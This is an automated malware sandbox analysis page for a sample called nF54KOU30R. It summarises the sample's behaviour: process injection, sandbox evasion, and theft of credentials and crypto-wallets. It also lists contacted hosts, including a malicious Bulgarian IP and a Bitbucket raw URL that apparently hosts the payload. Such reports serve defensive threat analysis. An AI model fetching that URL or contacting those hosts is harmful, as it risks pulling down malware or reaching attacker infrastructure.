  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446953 Sample: nF54KOU30R Startdate: 24/05/2024 Architecture: WINDOWS Score: 100 37 bitbucket.org 2->37 47 Snort IDS alert for network traffic 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 4 other signatures 2->53 11 nF54KOU30R.exe 12 2->11         started        signatures3 process4 dnsIp5 41 bitbucket.org 104.192.141.1, 443, 49736 AMAZON-02US United States 11->41 57 Writes to foreign memory regions 11->57 59 Allocates memory in foreign processes 11->59 61 Injects a PE file into a foreign processes 11->61 15 MSBuild.exe 1 11->15         started        17 WerFault.exe 2 11->17         started        19 WerFault.exe 2 11->19         started        signatures6 process7 process8 21 dialer.exe 15->21         started        25 WerFault.exe 2 15->25         started        27 WerFault.exe 2 15->27         started        dnsIp9 39 94.156.67.91, 443, 49737, 49738 TERASYST-ASBG Bulgaria 21->39 55 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 21->55 29 OpenWith.exe 21->29         started        signatures10 process11 signatures12 63 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->63 65 Tries to steal Mail credentials (via file / registry access) 29->65 67 Found many strings related to Crypto-Wallets (likely being stolen) 29->67 69 2 other signatures 29->69 32 wmplayer.exe 29->32         started        process13 signatures14 43 Writes to foreign memory regions 32->43 45 Allocates memory in foreign processes 32->45 35 dllhost.exe 32->35         started        process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.192.141.1
 bitbucket.org United States
16509 AMAZON-02US false
94.156.67.91
 unknown Bulgaria
31420 TERASYST-ASBG true

Contacted Domains

Name IP Active
bitbucket.org 104.192.141.1 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://bitbucket.org/exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAAAAAVCC false
  • Avira URL Cloud: safe
 unknown